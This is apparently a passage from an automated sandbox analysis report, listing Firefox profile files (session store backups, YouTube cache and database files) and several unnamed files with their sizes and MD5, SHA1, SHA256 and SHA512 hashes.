SHA5124483ef5be964117a11684f2e0a6f283c813dc45226a21bf60f658c7235d561b2fa7ea678538ac2867c798668e2a3860acaf860307986cf693fbf32693235a8f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\sessionstore-backups\recovery.baklz4
Filesize31KB
MD58a5122fe9f080c6727b6ab25461a260c
SHA1abe3d4c74b42577ed8f202cdb3e111d23236b47f
SHA256ab6ce14398f7d13f30506913824466e389249e673cbe74048ca91748b347034f
SHA512fa99f381578998d453d94948e851fb77134c775a8b2e01fe490fdb0e3dd66f94c8031dbb87b488ee67af1e626d17fc6b15fd7a385b480f8cd85adda952c0f41f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\sessionstore-backups\recovery.baklz4
Filesize31KB
MD5a6ad92ec4628e74d3ac2fded09995c4c
SHA1927e0758b82be341b0cecf77be394d01879fcf56
SHA256426e4c732e31aacfdf7b4d7c450259e7561f9e5c10e63af5f918438668cf1564
SHA51294b6704bbfc9add724ee66bae297cbd5433a792f50f8b6a2cd466d437d27c78acc4bd0a0f9b260d452f481f77ff49c39d0229f31e05b9238025c6f1d06189a77
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\sessionstore-backups\recovery.baklz4
Filesize34KB
MD590788d9829099165edcc9865f7e9e3d1
SHA1ed552134ab1a50d2019e654327cd2374e9db7128
SHA2561f89096b64738b5f70bc05a6cddd4f9968633018d2f1a1c921bb4464684b838e
SHA51207a2ffadc08a044c955e5276b0f8b8409017da5fc1df8a2b6171f1109f7dd7a6e71ab8fb07cbfdfd2b6c7157c94db1a8f3ef98beeaa5025b6dbd6625cf597faf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\108\{088c1165-9425-4c4d-a78e-0f731476716c}.final
Filesize58KB
MD5a88097b244e078da8867cf8b5b90ade4
SHA1c69cee7c6786d3ef32bfed012df505cfb5e7f3d9
SHA2565e6e906e219c687ee989b78a3d50822b727b6c4f2a96aef4ee19a0a3c356eb24
SHA51220c2808c27d4a9689520402480efb55978e6339c5ab5c243a2fc42c69f51e3bd5bd45cb7a30a9071c9b0cd2dd94f75df102e9d2b68804095bc33447db77fffc6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\110\{615a8a7d-2db6-4ad9-a72f-c9a0bed9456e}.final
Filesize64KB
MD57bd34e7570af7fc48f59a396c29b4f3e
SHA10da810c7515cdf21c6d863574bf020830ae71dad
SHA2563d69b59d57b6784efa9f51f9bc6fa19b32fab1c7a58c0a13b6e16dcd633e55e2
SHA512081a96cb012c7226c64e705b777652ecc2bdcfe201b8d1dfb3a8763cf73ac85ef2d823672e0bea4dca8f460f1f6fe2611f8272aa2ce3b5f44cca61e3bef631fc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\125\{9efe9640-4546-4709-96cc-a64eccb70b7d}.final
Filesize87KB
MD5cc349554270629bd8e52a1fb8256c5ca
SHA19e89e9bba083d4da7b27457e421d301a20b59d51
SHA256ec315fdc45fdd3030aa4d8911885282b1944ce14bb1c256dfb4bf9ad02cc0ebe
SHA512854b34fa60223825573111ec1c9a616e7e484537c764b78aa2b471d3c8d453f7f0b8a6f0bc469d5c627f3f2904436d8c6ca3729c6596bd5c53590e0fa733f7a5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\13\{996726f7-7a8e-4785-8718-a24146bb4c0d}.final
Filesize43KB
MD53355ac5e5f6162894408a84f598ed746
SHA1cf33e0caf68241b31b735b334469db00c95538f0
SHA2562caf8937444a0c9f0ebaa50f6c6d1a920b805a94442546a27be828431fa04c92
SHA512d269593a05a9bc3f331be58c11b07ac3b4e4f55e97ac84f9ea141e009cd6dfc59ca0662d94609e5f44c63b0c87df87b5a5168d12e583f81fe651328ef5ff0232
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\217\{343f7bb2-2ee3-4f37-9de6-c6ac927baad9}.final
Filesize4KB
MD5d4884a881d953813032160b897275864
SHA13e8166c89f2181cd33881cb48eb60e10be92d446
SHA256cc923863e38d96ce8e9c1713f415c0b34ae04b952fefdebf3ac5e2cb0026afe4
SHA5121a82fb35545e942c98e8c49f71bf6a73fa8d56d15cd01855ff032f3047c4b91ea7ad1ef8ceb53e1954119ca9dfbf0dc43f222172f2de378da1375ae7f5bc028d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\221\{2acb3886-9da2-406b-ac39-274a803227dd}.final
Filesize3KB
MD5f6100cf7d13e65b7a73098c134b062d4
SHA14879aea2b2279faf9ec57a80e1fae16540f1e504
SHA2568a4a0260cd89cce4a9c820e49ce172c4ca3f7ab138b22ea8fd86a1875ded67ea
SHA512b84fcca6bd21599be59b0a2a137b08ec89f934bd70f702a1ab28322ee7871cbe28de1d42254ed205a814c83c00f292e1fb2caeae3fa01773369b544d7dbd0df5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\cache\morgue\68\{3de2223f-59ba-4e43-a93a-40b019b27244}.final
Filesize13KB
MD5dacc8ffec9902ef08ff0aae907860f10
SHA1f8306ac32a929e86e0895ff1e8d5eb9774806873
SHA2562505e9f0a8d83d5d66c0e5cd4611ebf1e3be1ccd7280aa4fb3eb2f3662f0219e
SHA512d8575a1d5dc2d6826457e4ea6e966a046b1b7b81b947fd330b54a0d0889e7c7423f19787ec7eb2714f02b267559571b92ea87312dad14d27fb9901de3f2d14c7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\idb\2294832758yCt7-%iCt7-%r9eds3p1o.sqlite
Filesize48KB
MD5ed757e600d3ac92863dcfc368374c0b9
SHA17fe63cedbb71e96f480b1118e0de5b222250be00
SHA25625e5a4ac699ed44ac7d7ea01d1905501d7b4f16e0d349ea1ff9b20348c4f589c
SHA512a9492a3537436c7aa0409a80b362468a711300c00eb90a153e473775638abf5f3198def14fa192a93f65548603e2d07667f533ed736087b4fd5e6788d6b3532a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uhqcqu3c.default-release\storage\default\https+++www.youtube.com\idb\3211250388sbwdpsunsohintoatciif.sqlite-wal
Filesize40KB
MD5f56d93a35d4a21ec115f43ceee0e5374
SHA1b54abae5cbda6a2fb75b6697127dace56b323045
SHA256c072afcb30da4ff950e4e03adbbda214713b131da18bc46e3a1b29dd5f81022b
SHA5123f759ea58f85c36d769c23a70a361c91c4722fdbc23f96aeffa48f4f42a734cc1d92261dcb983c9d4c6851d1f9a2ab6e5227745fe9506d7ec0b8b285f7835bb4
-
Filesize
3.1MB
MD5c9d720a4200df5064f655adc3656056f
SHA10dc179cfc3cf564ea1e9c85e012ac9bda3b40464
SHA2569cd19cf01e1d8c64caa0dffcd07dfb3304fc7257a1c468c0f3d4df1ad696319f
SHA512f0628313d0bccdd94795d649f1f6eda194b97fe991fb1755d9525cf944b310569a6dc0a155caf17dc4e49fda4c5eaf42063443bb67abc19a079f934570136852
-
Filesize
103B
MD5b016dafca051f817c6ba098c096cb450
SHA14cc74827c4b2ed534613c7764e6121ceb041b459
SHA256b03c8c2d2429e9dbc7920113dedf6fc09095ab39421ee0cc8819ad412e5d67b9
SHA512d69663e1e81ec33654b87f2dfaddd5383681c8ebf029a559b201d65eb12fa2989fa66c25fa98d58066eab7b897f0eef6b7a68fa1a9558482a17dfed7b6076aca
-
Filesize
1.9MB
MD5c4f56f981bd109e0f90f95e60ba5e3c4
SHA1f96ec46dea31a127f13effba57ab4caaf814570b
SHA2561e1551129f56f0f52da5a7ba675eb1aacc8f0ca28118354d3d14f0ac50362b1c
SHA5124f26d19202d0d7b83a9e41f0d8f0f6a3cb8844d6c2413c49937f0d29ff482fdcbde0d28603bfebe3e78873417031697eedc2ebe552bd65cc21c92936b7fb6b4c
-
Filesize
122KB
MD59fe9b0ecaea0324ad99036a91db03ebb
SHA1144068c64ec06fc08eadfcca0a014a44b95bb908
SHA256e2cce64916e405976a1d0c522b44527d12b1cba19de25da62121cf5f41d184c9
SHA512906641a73d69a841218ae90b83714a05af3537eec8ad1d761f58ac365cf005bdd74ad88f71c4437aaa126ac74fa46bcad424d17c746ab197eec2caa1bd838176
-
Filesize
211KB
MD5a3ae5d86ecf38db9427359ea37a5f646
SHA1eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA51296ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0
-
Filesize
297KB
MD57a86ce1a899262dd3c1df656bff3fb2c
SHA133dcbe66c0dc0a16bab852ed0a6ef71c2d9e0541
SHA256b8f2d0909d7c2934285a8be010d37c0609c7854a36562cbfcbce547f4f4c7b0c
SHA512421e8195c47381de4b3125ab6719eec9be7acd2c97ce9247f4b70a309d32377917c9686b245864e914448fe53df2694d5ee5f327838d029989ba7acafda302ec